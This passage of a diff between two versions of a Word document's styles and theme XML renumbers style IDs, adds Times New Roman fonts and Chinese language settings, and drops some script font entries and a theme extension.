     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       <w:color w:val="1F4D78"/>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading4">
+  <w:style w:type="paragraph" w:styleId="5">
     <w:name w:val="heading 4"/>
-    <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:uiPriority w:val="9"/>
     <w:pPr>
       <w:outlineLvl w:val="3"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       <w:i/>
       <w:iCs/>
       <w:color w:val="2E74B5"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading5">
+  <w:style w:type="paragraph" w:styleId="6">
     <w:name w:val="heading 5"/>
-    <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:uiPriority w:val="9"/>
     <w:pPr>
       <w:outlineLvl w:val="4"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       <w:color w:val="2E74B5"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Heading6">
+  <w:style w:type="paragraph" w:styleId="7">
     <w:name w:val="heading 6"/>
-    <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
     <w:qFormat/>
+    <w:uiPriority w:val="9"/>
     <w:pPr>
       <w:outlineLvl w:val="5"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       <w:color w:val="1F4D78"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
+  <w:style w:type="character" w:default="1" w:styleId="8">
     <w:name w:val="Default Paragraph Font"/>
-    <w:uiPriority w:val="1"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:uiPriority w:val="1"/>
   </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
+  <w:style w:type="table" w:default="1" w:styleId="9">
     <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:uiPriority w:val="99"/>
     <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
         <w:top w:w="0" w:type="dxa"/>
         <w:left w:w="108" w:type="dxa"/>
@@ -9327,103 +7703,35 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="NoList">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
+  <w:style w:type="character" w:styleId="10">
+    <w:name w:val="endnote reference"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Title">
-    <w:name w:val="Title"/>
-    <w:uiPriority w:val="10"/>
     <w:qFormat/>
-    <w:rPr>
-      <w:sz w:val="56"/>
-      <w:szCs w:val="56"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Strong1">
-    <w:name w:val="Strong1"/>
-    <w:qFormat/>
-    <w:rPr>
-      <w:b/>
-      <w:bCs/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="ListParagraph">
-    <w:name w:val="List Paragraph"/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="character" w:styleId="Hyperlink">
-    <w:name w:val="Hyperlink"/>
     <w:uiPriority w:val="99"/>
-    <w:unhideWhenUsed/>
-    <w:rPr>
-      <w:color w:val="0563C1"/>
-      <w:u w:val="single"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:styleId="FootnoteReference">
-    <w:name w:val="footnote reference"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="FootnoteText">
-    <w:name w:val="footnote text"/>
-    <w:link w:val="FootnoteTextChar"/>
-    <w:uiPriority w:val="99"/>
+  <w:style w:type="paragraph" w:styleId="11">
+    <w:name w:val="endnote text"/>
+    <w:link w:val="21"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteTextChar">
-    <w:name w:val="Footnote Text Char"/>
-    <w:link w:val="FootnoteText"/>
+    <w:qFormat/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
     <w:rPr>
-      <w:sz w:val="20"/>
-      <w:szCs w:val="20"/>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="EndnoteReference">
-    <w:name w:val="endnote reference"/>
+  <w:style w:type="paragraph" w:styleId="12">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="1"/>
+    <w:link w:val="23"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
     <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rPr>
-      <w:vertAlign w:val="superscript"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="EndnoteText">
-    <w:name w:val="endnote text"/>
-    <w:link w:val="EndnoteTextChar"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="EndnoteTextChar">
-    <w:name w:val="Endnote Text Char"/>
-    <w:link w:val="EndnoteText"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rPr>
-      <w:sz w:val="20"/>
-      <w:szCs w:val="20"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Header">
-    <w:name w:val="header"/>
-    <w:basedOn w:val="Normal"/>
-    <w:link w:val="HeaderChar"/>
-    <w:uiPriority w:val="99"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00267CCC"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="center" w:pos="4513"/>
@@ -9431,20 +7739,35 @@
       </w:tabs>
     </w:pPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
-    <w:name w:val="Header Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Header"/>
+  <w:style w:type="character" w:styleId="13">
+    <w:name w:val="footnote reference"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="00267CCC"/>
+    <w:rPr>
+      <w:vertAlign w:val="superscript"/>
+    </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Footer">
-    <w:name w:val="footer"/>
-    <w:basedOn w:val="Normal"/>
-    <w:link w:val="FooterChar"/>
+  <w:style w:type="paragraph" w:styleId="14">
+    <w:name w:val="footnote text"/>
+    <w:link w:val="20"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
     <w:uiPriority w:val="99"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="15">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="1"/>
+    <w:link w:val="22"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00267CCC"/>
+    <w:qFormat/>
+    <w:uiPriority w:val="99"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="center" w:pos="4513"/>
@@ -9452,12 +7775,84 @@
       </w:tabs>
     </w:pPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+  <w:style w:type="character" w:styleId="16">
+    <w:name w:val="Hyperlink"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:uiPriority w:val="99"/>
+    <w:rPr>
+      <w:color w:val="0563C1"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="17">
+    <w:name w:val="Title"/>
+    <w:qFormat/>
+    <w:uiPriority w:val="10"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:sz w:val="56"/>
+      <w:szCs w:val="56"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:customStyle="1" w:styleId="18">
+    <w:name w:val="Strong1"/>
+    <w:qFormat/>
+    <w:uiPriority w:val="0"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:b/>
+      <w:bCs/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="19">
+    <w:name w:val="List Paragraph"/>
+    <w:qFormat/>
+    <w:uiPriority w:val="0"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+      <w:lang w:val="zh-CN" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="20">
+    <w:name w:val="Footnote Text Char"/>
+    <w:link w:val="14"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:uiPriority w:val="99"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="21">
+    <w:name w:val="Endnote Text Char"/>
+    <w:link w:val="11"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:uiPriority w:val="99"/>
+    <w:rPr>
+      <w:sz w:val="20"/>
+      <w:szCs w:val="20"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="22">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="8"/>
+    <w:link w:val="15"/>
+    <w:qFormat/>
+    <w:uiPriority w:val="99"/>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="23">
     <w:name w:val="Footer Char"/>
-    <w:basedOn w:val="DefaultParagraphFont"/>
-    <w:link w:val="Footer"/>
+    <w:basedOn w:val="8"/>
+    <w:link w:val="12"/>
+    <w:qFormat/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="00267CCC"/>
   </w:style>
 </w:styles>
 </file>
@@ -9505,7 +7900,7 @@
     </a:clrScheme>
     <a:fontScheme name="Office">
       <a:majorFont>
-        <a:latin typeface="Aptos Display" panose="02110004020202020204"/>
+        <a:latin typeface="Aptos Display"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
         <a:font script="Jpan" typeface="游ゴシック Light"/>
@@ -9538,26 +7933,9 @@
         <a:font script="Viet" typeface="Times New Roman"/>
         <a:font script="Uigh" typeface="Microsoft Uighur"/>
         <a:font script="Geor" typeface="Sylfaen"/>
-        <a:font script="Armn" typeface="Arial"/>
-        <a:font script="Bugi" typeface="Leelawadee UI"/>
-        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
-        <a:font script="Java" typeface="Javanese Text"/>
-        <a:font script="Lisu" typeface="Segoe UI"/>
-        <a:font script="Mymr" typeface="Myanmar Text"/>
-        <a:font script="Nkoo" typeface="Ebrima"/>
-        <a:font script="Olck" typeface="Nirmala UI"/>
-        <a:font script="Osma" typeface="Ebrima"/>
-        <a:font script="Phag" typeface="Phagspa"/>
-        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
-        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
-        <a:font script="Syre" typeface="Estrangelo Edessa"/>
-        <a:font script="Sora" typeface="Nirmala UI"/>
-        <a:font script="Tale" typeface="Microsoft Tai Le"/>
-        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
-        <a:font script="Tfng" typeface="Ebrima"/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Aptos" panose="02110004020202020204"/>
+        <a:latin typeface="Aptos"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
         <a:font script="Jpan" typeface="游明朝"/>
@@ -9590,23 +7968,6 @@
         <a:font script="Viet" typeface="Arial"/>
         <a:font script="Uigh" typeface="Microsoft Uighur"/>
         <a:font script="Geor" typeface="Sylfaen"/>
-        <a:font script="Armn" typeface="Arial"/>
-        <a:font script="Bugi" typeface="Leelawadee UI"/>
-        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
-        <a:font script="Java" typeface="Javanese Text"/>
-        <a:font script="Lisu" typeface="Segoe UI"/>
-        <a:font script="Mymr" typeface="Myanmar Text"/>
-        <a:font script="Nkoo" typeface="Ebrima"/>
-        <a:font script="Olck" typeface="Nirmala UI"/>
-        <a:font script="Osma" typeface="Ebrima"/>
-        <a:font script="Phag" typeface="Phagspa"/>
-        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
-        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
-        <a:font script="Syre" typeface="Estrangelo Edessa"/>
-        <a:font script="Sora" typeface="Nirmala UI"/>
-        <a:font script="Tale" typeface="Microsoft Tai Le"/>
-        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
-        <a:font script="Tfng" typeface="Ebrima"/>
       </a:minorFont>
     </a:fontScheme>
     <a:fmtScheme name="Office">
@@ -9748,11 +8109,5 @@
     </a:fmtScheme>
   </a:themeElements>
   <a:objectDefaults/>
-  <a:extraClrSchemeLst/>
-  <a:extLst>
-    <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{2E142A2C-CD16-42D6-873A-C26D2A0506FA}" vid="{1BDDFF52-6CD6-40A5-AB3C-68EB2F1E4D0A}"/>
-    </a:ext>
-  </a:extLst>
 </a:theme>
 </file>